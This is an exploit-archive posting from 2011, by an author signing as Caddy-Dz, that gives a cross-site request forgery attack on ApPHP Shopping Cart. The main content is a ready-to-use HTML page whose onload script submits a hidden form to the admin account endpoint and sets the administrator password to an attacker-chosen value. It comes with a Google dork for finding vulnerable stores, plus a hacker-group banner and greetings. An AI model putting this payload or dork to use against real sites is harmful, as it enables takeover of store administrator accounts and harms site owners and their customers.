ApPHP Shopping Cart <= XSRF (Change Admin Password)



EKU-ID: 365 CVE: OSVDB-ID:
Author: Caddy-Dz Published: 2011-05-31 Verified: Not Verified
Download:

Rating

☆☆☆☆☆
Home


=================================================================================
                      .__         .__  __            .__    .___

  ____ ___  _________ |  |   ____ |__|/  |_          |__| __| _/
_/ __ \\  \/  /\____ \|  |  /  _ \|  \   __\  ______ |  |/ __ |
\  ___/ >    < |  |_> >  |_(  <_> )  ||  |   /_____/ |  / /_/ |

\___  >__/\_ \|   __/|____/\____/|__||__|           |__\____ |
     \/      \/|__|                                          \/

Exploit-ID is the Indonesian Exploit Archive

Web             : exploit-id.com

e-mail          : root[at]exploit-id.com              

                      #########################################
                       I'm Caddy-Dz ,  member of exploit-id.com

                      #########################################  
================================================================================
####
# Exploit Title: ApPHP Shopping Cart <= XSRF (Change Admin Password)
# Author: Caddy-Dz
# Facebook Page: www.facebook.com/islam.caddy
# E-mail: islam_babia@hotmail.com  |  Caddy-Dz@exploit-id.com
# Category:: webapps
# Google Dork: intext:"Home : My Account : Shopping Cart : Checkout"
# Vendor: http://www.apphp.com/index.php?page=product&pc=PHPSC
# Tested on: [Windows Vista Edition Intégrale]
####

[*] ## ExPLo!T:

~~~~~~~~Change Admin Password~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


<html>
<head>
<title>ApPHP Shopping Cart XSRF (Change Admin Password)</title>
</head>

<body onload="javascript:fireForms()">
<script language="JavaScript">

function fireForms()
{
    var count = 1;
    var i=0;
   
    for(i=0; i<count; i++)
    {
        document.forms[i].submit();
    }
}
  
</script>
<form action="http://127.0.0.1/[Path]/index.php?admin=my_account" name="submit_type" method="post">
<input type='hidden' name='submit_type' id='submit_type' value='put any number here' />
<input type='hidden' name="password_one" type="password" value="caddy" />
<input type='hidden' name="password_two" type="password" value="caddy" />


</form>

####

Peace From Algeria

####

=================================**Algerians Hackers**=======================================
# Greets To :
  KedAns-Dz & **All Algerians Hackers** , jos_ali_joe , All Exploit-Id Team ,  Kalashinkov3 ,
  (exploit-id.com) , (1337day.com) , (09exploit.com) , All My Friends: T!riRou , ChoK0 , MeRdaw! ,
  CaRras0 , StiffLer , MaaTar , St0fa , Nissou , RmZ ...others
============================================================================================